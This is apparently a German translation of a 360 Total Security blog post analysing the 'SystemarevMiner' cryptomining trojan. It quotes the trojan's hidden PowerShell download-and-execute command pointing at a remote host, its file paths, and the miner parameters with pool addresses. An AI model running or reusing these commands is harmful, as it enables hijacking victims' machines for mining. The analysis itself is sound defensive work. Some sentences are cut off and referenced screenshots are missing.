SustemarevMiner: ein CryptoMiner, der frei Antivirus-Unterbrechungen überstehen kann

Juli 23, 2018Elley
Mehr Infos zum 360 Total Security

360 Security Center hat vor kurzem eine Art von Cryptominer-Trojaner gefunden, der sich aktiv frei weiterverbreitet. Dieser Trojaner verbirgt sich zur Vermeidung der Ermittlung durch Antivirusprogramme hinter angesetzten Aufgaben als Cryptojacking-Malware. Selbst wenn ein Trojaner bereits ermittelt und entfernt wurde, kann er noch vorhanden sein, solange es die Script-Datei gibt. Wir haben ihn „SystemarevMiner“ benannt.

Analyse

Der Trojaner wird hauptsächlich durch Spiel-Plug-ins und Software-Cracks auf dem Computer des Nutzers installiert. Geben Sie die folgenden Dateien nach Herunterladen des Installationspakets frei:
c:\program files\systemarev\revservicesx\app_loader.exe
c:\program files\systemarev\revservicesx\systemupdate64x.exe
C:\Program Files\Common Files\restore_rev.bat

Erstellen mehrerer geplanter Aufgaben und Service-Startprogramme:

Die Datei restore_rev.bat ist als Hidden Property festgelegt und wird geplanten Aufgaben hinzugefügt. Die Batch-Datei nutzt PowerShell, um das neue PowerShell-Trojaner-Skript herunterzuladen:
powershell -ExecutionPolicy ByPass -WindowStyle Hidden -Command “iex ((new-object net.webclient).DownloadString(‘http://77.super-me.online/files/restore_rev_inj.ps1’))”

Restore_rev_inj.ps1 wird als PowerShell-Skript heruntergeladen. Der Inhalt wird unten angezeigt:

Durch das Skript sind die durch die Anwendung heruntergeladenen Dateien:
amd64.exe ist eine Mining-Anwendung, die für Krypto-Mining die OpenCL AMD-Grafikkarte nutzt
Mining-Parameter:“-B –no-color -r 50 -o 85.25.74.57:2228 -u x -p x –variant -1 -k –nicehash“

cud8.exe ist ein Mining-Tool, das für das Krypto-Mining NVIDIA-Grafikkarten nutzt
Mining-Parameter:“-B –no-color -r 50 -o 85.25.74.57:2229 -u x -p x –variant 1 -k –nicehash“

64.exe ist XMR/XMV, das für das Krypto-Mining CPU nutzt
Mining-Parameter:“–auto –any –forever –variation 3 -o xmr-us-east1.nanopool.org:14444 -u [HASH].jce2/x@x.com -p x“

Wir sehen die Einnahmen:

Der andere profitabelste Mining Pool:

Mining-Pool-Einnahmen des Kontos ingesamt:

MServicesX.exe ist ein Trojaner-Installationspaket, das die ersten drei Dateien der Installation wiederherstellen soll. Selbst wenn die.

Erinnerung
In letzter Zeit haben wir festgestellt, dass sich viele CryptoMiner-Trojaner in freier Wildbahn ausbreiten. Wir empfehlen Anwendern dringend, bei der Installation neuer Anwendungen Antivirus-Software einzusetzen. Anwendern wird auch empfohlen, gemeinsam mit 360 Total Security einen Virenscanner laufen zu lassen, um nicht zum CryptoMiner-Opfer zu werden.

Mehr Infos zum 360 Total Security